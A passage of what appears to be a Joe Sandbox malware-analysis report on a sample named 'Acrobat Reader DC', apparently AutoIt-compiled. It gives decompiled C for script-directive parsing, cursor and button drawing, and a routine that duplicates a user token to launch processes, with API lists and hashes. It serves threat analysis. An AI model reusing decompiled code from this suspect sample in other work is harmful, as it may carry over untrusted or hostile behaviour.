										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E00444BFC();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E00454014(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E00410190(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E004033C0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E004114AB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E00410160(_t120 + 0x2c, __eflags);
								E00444B5F(_t98, _t122);
								E00444BBB(_t98, __eflags, _t122);
								_t86 = E004111C1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E00444B5F(0, _t119);
									E00444BBB(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E004111DC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}








































                                  0x00403a20
                                  0x00403a20
                                  0x00403a28
                                  0x00403a2f
                                  0x00403a37
                                  0x00428412
                                  0x00428414
                                  0x00428419
                                  0x0042841c
                                  0x0042841e
                                  0x00428435
                                  0x0042843a
                                  0x0042843d
                                  0x0042843f
                                  0x00428457
                                  0x0042845c
                                  0x0042845f
                                  0x00428461
                                  0x00428479
                                  0x0042847e
                                  0x00428481
                                  0x00428483
                                  0x004284ed
                                  0x004284f2
                                  0x004284f5
                                  0x004284f7
                                  0x0042854d
                                  0x00428552
                                  0x00428555
                                  0x00428557
                                  0x004285bd
                                  0x004285c2
                                  0x004285c5
                                  0x004285c7
                                  0x004285e1
                                  0x004285e1
                                  0x004285e4
                                  0x004285eb
                                  0x004285f5
                                  0x004285f7
                                  0x00000000
                                  0x00000000
                                  0x004285f9
                                  0x004285fc
                                  0x00428602
                                  0x0042860f
                                  0x00428614
                                  0x00428617
                                  0x00428619
                                  0x0042866c
                                  0x0042866c
                                  0x00000000
                                  0x0042866c
                                  0x00428623
                                  0x00428628
                                  0x0042862b
                                  0x0042862d
                                  0x00000000
                                  0x00000000
                                  0x00428637
                                  0x0042863c
                                  0x0042863f
                                  0x00428641
                                  0x00428657
                                  0x0042865a
                                  0x0042865b
                                  0x0042865e
                                  0x00428660
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428662
                                  0x0042864b
                                  0x00428650
                                  0x00428653
                                  0x00428655
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428655
                                  0x00428674
                                  0x00428678
                                  0x00428423
                                  0x00000000
                                  0x00428423
                                  0x0042868c
                                  0x00000000
                                  0x00428691
                                  0x004285d1
                                  0x004285d6
                                  0x004285d9
                                  0x004285db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004285db
                                  0x0042855f
                                  0x00428563
                                  0x00428564
                                  0x00428565
                                  0x0042856d
                                  0x00428570
                                  0x00428572
                                  0x00428574
                                  0x004285a9
                                  0x00000000
                                  0x004285ae
                                  0x00428576
                                  0x00428577
                                  0x00428578
                                  0x00428584
                                  0x0042858b
                                  0x0042858c
                                  0x0042858d
                                  0x00428594
                                  0x00000000
                                  0x00428599
                                  0x004284f9
                                  0x004284fc
                                  0x00000000
                                  0x00000000
                                  0x00428502
                                  0x00428502
                                  0x00428504
                                  0x00428511
                                  0x00428516
                                  0x00428519
                                  0x0042851b
                                  0x00000000
                                  0x00000000
                                  0x0042851d
                                  0x0042851e
                                  0x00428521
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428523
                                  0x00428535
                                  0x00000000
                                  0x0042853f
                                  0x0042848d
                                  0x00428490
                                  0x00428496
                                  0x0042849c
                                  0x004284a4
                                  0x004284aa
                                  0x004284c5
                                  0x004284ac
                                  0x004284ae
                                  0x004284ae
                                  0x004284b2
                                  0x004284b7
                                  0x004284bd
                                  0x004284c2
                                  0x004284c2
                                  0x004284d0
                                  0x004284d2
                                  0x004284d3
                                  0x00000000
                                  0x004284db
                                  0x00428463
                                  0x00000000
                                  0x00428467
                                  0x00428441
                                  0x00000000
                                  0x00428445
                                  0x00428420
                                  0x00000000
                                  0x00428420
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430737(signed int _a4) {
				signed int _t4;

				_t4 = _a4;
				if(_t4 > 0x10) {
					L16:
					return SetCursor(LoadCursorW(0, 0x7f00));
				} else {
					switch( *((intOrPtr*)(_t4 * 4 +  &M004308AB))) {
						case 0:
							return SetCursor(LoadCursorW(0, 0x7f89));
							goto L17;
						case 1:
							__eax = LoadCursorW(0, 0x7f8a);
							return __eax;
							goto L17;
						case 2:
							goto L16;
						case 3:
							__eax = LoadCursorW(0, 0x7f03);
							return __eax;
							goto L17;
						case 4:
							__eax = LoadCursorW(0, 0x7f8b);
							return __eax;
							goto L17;
						case 5:
							__eax = LoadCursorW(0, 0x7f01);
							return __eax;
							goto L17;
						case 6:
							__eax = LoadCursorW(0, 0x7f88);
							return __eax;
							goto L17;
						case 7:
							__eax = LoadCursorW(0, 0x7f86);
							return __eax;
							goto L17;
						case 8:
							__eax = LoadCursorW(0, 0x7f83);
							return __eax;
							goto L17;
						case 9:
							__eax = LoadCursorW(0, 0x7f85);
							return __eax;
							goto L17;
						case 0xa:
							__eax = LoadCursorW(0, 0x7f82);
							return __eax;
							goto L17;
						case 0xb:
							__eax = LoadCursorW(0, 0x7f84);
							return __eax;
							goto L17;
						case 0xc:
							__eax = LoadCursorW(0, 0x7f04);
							return __eax;
							goto L17;
						case 0xd:
							__eax = LoadCursorW(0, 0x7f02);
							return __eax;
							goto L17;
						case 0xe:
							return SetCursor(0);
							goto L17;
					}
				}
				L17:
			}




                                  0x0043073a
                                  0x00430740
                                  0x00430891
                                  0x004308a6
                                  0x00430746
                                  0x00430746
                                  0x00000000
                                  0x00430762
                                  0x00000000
                                  0x00000000
                                  0x0043076c
                                  0x0043077a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00430784
                                  0x00430792
                                  0x00000000
                                  0x00000000
                                  0x0043079c
                                  0x004307aa
                                  0x00000000
                                  0x00000000
                                  0x004307b4
                                  0x004307c2
                                  0x00000000
                                  0x00000000
                                  0x004307cc
                                  0x004307da
                                  0x00000000
                                  0x00000000
                                  0x004307e4
                                  0x004307f2
                                  0x00000000
                                  0x00000000
                                  0x004307fc
                                  0x0043080a
                                  0x00000000
                                  0x00000000
                                  0x00430814
                                  0x00430822
                                  0x00000000
                                  0x00000000
                                  0x0043082c
                                  0x0043083a
                                  0x00000000
                                  0x00000000
                                  0x00430844
                                  0x00430852
                                  0x00000000
                                  0x00000000
                                  0x0043085c
                                  0x0043086a
                                  0x00000000
                                  0x00000000
                                  0x00430874
                                  0x00430882
                                  0x00000000
                                  0x00000000
                                  0x0043088e
                                  0x00000000
                                  0x00000000
                                  0x00430746
                                  0x00000000

                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E004308EF(struct HBRUSH__* _a4, struct HWND__** _a8) {
				long _v8;
				long _v12;
				signed int _v16;
				int _v20;
				signed int _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				struct tagRECT _v60;
				void* __edi;
				void* __esi;
				signed int _t72;
				signed int _t73;
				long _t74;
				long _t75;
				long _t76;
				long _t78;
				long _t79;
				void* _t80;
				signed int _t93;
				WCHAR* _t95;
				struct HWND__** _t117;
				struct HBRUSH__* _t149;
				WCHAR* _t150;
				struct HDC__* _t152;
				signed int _t159;

				_t149 = _a4;
				_t72 =  *(_t149 + 0x10);
				_t152 =  *(_t149 + 0x18);
				_t73 = _t72 & 0x00000006;
				_v24 = _t72 & 0x00000010;
				_v16 = _t73;
				if(_t73 == 0) {
					_t117 = _a8;
					_t74 =  *(_t117 + 0x48);
					__eflags = _t74 - 0xffffffff;
					if(__eflags == 0) {
						_t74 = GetSysColor(0x12);
					}
					_t75 = SetTextColor(_t152, _t74);
				} else {
					_t75 = SetTextColor(_t152, GetSysColor(0xe));
					_t117 = _a8;
				}
				_v8 = _t75;
				_t76 =  *(_t117 + 0x44);
				if(_t76 != 0xffffffff) {
					_a4 = CreateSolidBrush(_t76);
					_t78 =  *(_t117 + 0x44);
				} else {
					_a4 = GetSysColorBrush(0xf);
					_t78 = GetSysColor(0xf);
				}
				_v12 = _t78;
				if(_v16 == 0) {
					_t79 = 0x743c00;
				} else {
					_t79 = GetSysColor(0x11);
				}
				_t80 = CreatePen(0, 1, _t79);
				_v40 = _t80;
				_v36 = SelectObject(_t152, _t80);
				_v44 = SetBkColor(_t152, _v12);
				_v32 = SelectObject(_t152, _a4);
				_v60.top =  *(_t149 + 0x20);
				_v60.left =  *(_t149 + 0x1c);
				_v60.right =  *(_t149 + 0x24);
				_v60.bottom =  *(_t149 + 0x28);
				InflateRect( &_v60, 0xffffffff, 0xffffffff);
				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
				_v12 = 0x105;
				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
				if(_t159 == 0) {
					_v12 = 0x125;
				}
				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
				_v20 = _t93;
				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
				_t95 = E004115D7(_t149, _t152, _t159);
				_v28 = _t95;
				GetWindowTextW( *_a8, _t95, _v20);
				if(_v24 != 0) {
					_v60.top =  *(_t149 + 0x20);
					_v60 =  *(_t149 + 0x1c);
					_v60.right =  *(_t149 + 0x24);
					_v60.bottom =  *(_t149 + 0x28);
					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
					DrawFocusRect(_t152,  &_v60);
				}
				if(_v16 != 0) {
					SetTextColor(_t152, GetSysColor(0x11));
				}
				_t150 = _v28;
				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
				_push(_t150);
				E004111DC();
				SelectObject(_t152, _v32);
				DeleteObject(_a4);
				SelectObject(_t152, _v36);
				DeleteObject(_v40);
				SetTextColor(_t152, _v8);
				SetBkColor(_t152, _v44);
				return 1;
			}































                                  0x004308f8
                                  0x004308fb
                                  0x004308fe
                                  0x00430906
                                  0x00430909
                                  0x0043090c
                                  0x0043090f
                                  0x00430926
                                  0x00430929
                                  0x0043092c
                                  0x0043092f
                                  0x00430933
                                  0x00430933
                                  0x0043093b
                                  0x00430911
                                  0x0043091b
                                  0x00430921
                                  0x00430921
                                  0x00430941
                                  0x00430944
                                  0x0043094a
                                  0x00430968
                                  0x0043096b
                                  0x0043094c
                                  0x00430956
                                  0x00430959
                                  0x00430959
                                  0x00430972
                                  0x00430975
                                  0x00430981
                                  0x00430977
                                  0x00430979
                                  0x00430979
                                  0x0043098b
                                  0x00430999
                                  0x004309a3
                                  0x004309b1
                                  0x004309bc
                                  0x004309c4
                                  0x004309c7
                                  0x004309d3
                                  0x004309d6
                                  0x004309d9
                                  0x004309f4
                                  0x00430a02
                                  0x00430a0f
                                  0x00430a14
                                  0x00430a16
                                  0x00430a16
                                  0x00430a2f
                                  0x00430a32
                                  0x00430a43
                                  0x00430a44
                                  0x00430a54
                                  0x00430a5a
                                  0x00430a64
                                  0x00430a71
                                  0x00430a74
                                  0x00430a80
                                  0x00430a83
                                  0x00430a86
                                  0x00430a91
                                  0x00430a91
                                  0x00430a9b
                                  0x00430aa7
                                  0x00430aa7
                                  0x00430ab0
                                  0x00430abc
                                  0x00430ac2
                                  0x00430ac3
                                  0x00430ad0
                                  0x00430adc
                                  0x00430ae3
                                  0x00430ae9
                                  0x00430af0
                                  0x00430afb
                                  0x00430b0c

                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32 ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32 ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1582027408-0
                                  • Opcode ID: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446313 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 234processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00446313(intOrPtr _a4, char _a7, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20, signed int _a24, WCHAR* _a28, struct _STARTUPINFOW* _a32, struct _PROCESS_INFORMATION* _a36) {
				char _v9;
				void* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				struct HWINSTA__* _v32;
				intOrPtr _v40;
				WCHAR* _v44;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _v80;
				char _v88;
				void* __edi;
				void* __esi;
				char _t88;
				struct HDESK__* _t90;
				struct HWINSTA__* _t91;
				void* _t95;
				struct HDESK__* _t103;
				void* _t105;
				void* _t106;
				struct _STARTUPINFOW* _t109;
				intOrPtr _t110;
				void* _t118;
				WCHAR* _t127;
				int _t156;
				struct HWINSTA__* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t175;

				_t154 = _a4;
				_t158 = 0;
				_v9 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0;
				_v32 = 0;
				_t127 = 0;
				_v28 = 0;
				E00412F40( &_v88, 0, 0x20);
				_t85 = _a16;
				_t160 = _t159 + 0xc;
				_v88 = 0x20;
				_v80 = _a4;
				_a7 = 0;
				if((_a16 & 0x00000001) != 0) {
					_a7 = 1;
				}
				if(E00436CD7(_t154, _a8, _a12, _t85,  &_v16) == 0) {
					L24:
					_t88 = _v60;
					__eflags = _t88;
					if(_t88 != 0) {
						__imp__UnloadUserProfile(_v16, _t88);
					}
					goto L26;
				} else {
					if((_a16 & 0x00000002) == 0) {
						L6:
						_t158 = OpenWindowStationW(L"winsta0", 0, 0x60000);
						if(_t158 == 0 || _t158 == 0xffffffff) {
							goto L24;
						} else {
							_v32 = GetProcessWindowStation();
							if(SetProcessWindowStation(_t158) == 0) {
								goto L24;
							}
							_t103 = OpenDesktopW(L"default", 0, 0, 0x60081);
							_v24 = _t103;
							if(_t103 == 0) {
								goto L24;
							}
							_t171 = _t103 - 0xffffffff;
							if(_t103 == 0xffffffff) {
								goto L24;
							}
							_t105 = E00436D09(_t158, _t171, _v16,  &_v20);
							_t172 = _t105;
							if(_t105 == 0) {
								goto L24;
							}
							_v56 = 0xb00;
							_v52 = 0xf0000000;
							_v44 = 0x400;
							_v40 = 0xf037f;
							_t106 = E00446124(_t172, _t158, _v20,  &_v56);
							_t173 = _t106;
							if(_t106 == 0) {
								goto L24;
							}
							_v44 = _t127;
							_v40 = 0xf01ff;
							if(E00445F35(_t173, _v24, _v20,  &_v44) == 0) {
								goto L24;
							}
							_t109 = _a32;
							_t109->lpDesktop = L"winsta0\\default";
							_t110 = _a20;
							_t156 =  *(_t109 + 0x2c) & 0x00000100;
							_a12 = _t156;
							_t175 = _t110;
							if(_t175 != 0) {
								_t47 = E004111C1(_t110) + 1; // 0x1
								_push( ~(_t175 > 0) | _t47 * 0x00000002);
								_t127 = E004115D7(_t47, _t158,  ~(_t175 > 0) | _t47 * 0x00000002);
								_t110 = E00412FBA(_t127, _a20, _t47);
								_t156 = _a12;
								_t160 = _t160 + 0x14;
							}
							if(_a7 == 0) {
								L18:
								if((_a16 & 0x00000004) != 0) {
									L20:
									if(CreateProcessAsUserW(_v16, 0, _t127, 0, 0, _t156, _a24 | 0x00000400, _v28, _a28, _a32, _a36) == 0) {
										goto L24;
									}
									if(_a7 != 0) {
										E00436C6E(_a36,  &_v60,  &_v16);
									}
									_v9 = 1;
									L26:
									E00436BA9(_v20);
									if(_t158 != 0) {
										CloseWindowStation(_t158);
									}
									_t90 = _v24;
									if(_t90 != 0) {
										CloseDesktop(_t90);
									}
									_t91 = _v32;
									if(_t91 != 0) {
										SetProcessWindowStation(_t91);
									}
									CloseHandle(_v16);
									_push(_t127);
									E004111DC();
									_t95 = _v28;
									if(_t95 != 0) {
										__imp__DestroyEnvironmentBlock(_t95);
									}
									return _v9;
								}
								_t118 = _v16;
								__imp__CreateEnvironmentBlock( &_v28, _t118, 0);
								if(_t118 == 0) {
									goto L24;
								}
								goto L20;
							} else {
								__imp__LoadUserProfileW(_v16,  &_v88);
								if(_t110 == 0) {
									goto L24;
								}
								goto L18;
							}
						}
					}
					if(DuplicateTokenEx(_v16, 0, 0, 2, 1,  &_a12) == 0) {
						goto L24;
					}
					CloseHandle(_v16);
					_v16 = _a12;
					goto L6;
				}
			}


































                                  0x0044631c
                                  0x0044631f
                                  0x00446328
                                  0x0044632c
                                  0x0044632f
                                  0x00446332
                                  0x00446335
                                  0x00446338
                                  0x0044633a
                                  0x0044633d
                                  0x00446342
                                  0x00446345
                                  0x00446348
                                  0x0044634f
                                  0x00446352
                                  0x00446357
                                  0x00446359
                                  0x00446359
                                  0x00446372
                                  0x00446549
                                  0x00446549
                                  0x0044654c
                                  0x0044654e
                                  0x00446555
                                  0x00446555
                                  0x00000000
                                  0x00446378
                                  0x0044637c
                                  0x004463ac
                                  0x004463be
                                  0x004463c2
                                  0x00000000
                                  0x004463d1
                                  0x004463d8
                                  0x004463e3
                                  0x00000000
                                  0x00000000
                                  0x004463f7
                                  0x004463fd
                                  0x00446402
                                  0x00000000
                                  0x00000000
                                  0x00446408
                                  0x0044640b
                                  0x00000000
                                  0x00000000
                                  0x00446419
                                  0x0044641e
                                  0x00446420
                                  0x00000000
                                  0x00000000
                                  0x0044642f
                                  0x00446435
                                  0x0044643c
                                  0x00446442
                                  0x00446449
                                  0x0044644e
                                  0x00446450
                                  0x00000000
                                  0x00000000
                                  0x00446462
                                  0x00446466
                                  0x00446474
                                  0x00000000
                                  0x00000000
                                  0x0044647a
                                  0x00446480
                                  0x00446487
                                  0x0044648a
                                  0x00446490
                                  0x00446493
                                  0x00446495
                                  0x0044649d
                                  0x004464b2
                                  0x004464b8
                                  0x004464c0
                                  0x004464c5
                                  0x004464c8
                                  0x004464c8
                                  0x004464cf
                                  0x004464e3
                                  0x004464e7
                                  0x004464fd
                                  0x0044652a
                                  0x00000000
                                  0x00000000
                                  0x00446530
                                  0x0044653e
                                  0x0044653e
                                  0x00446543
                                  0x0044655b
                                  0x0044655f
                                  0x00446569
                                  0x0044656c
                                  0x0044656c
                                  0x00446572
                                  0x00446577
                                  0x0044657a
                                  0x0044657a
                                  0x00446580
                                  0x00446585
                                  0x00446588
                                  0x00446588
                                  0x00446592
                                  0x00446598
                                  0x00446599
                                  0x0044659e
                                  0x004465a6
                                  0x004465a9
                                  0x004465a9
                                  0x004465b8
                                  0x004465b8
                                  0x004464e9
                                  0x004464f3
                                  0x004464fb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004464d1
                                  0x004464d9
                                  0x004464e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004464e1
                                  0x004464cf
                                  0x004463c2
                                  0x00446396
                                  0x00000000
                                  0x00000000
                                  0x004463a0
                                  0x004463a9
                                  0x00000000
                                  0x004463a9

                                  APIs
                                  • _memset.LIBCMT ref: 0044633D
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32 ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
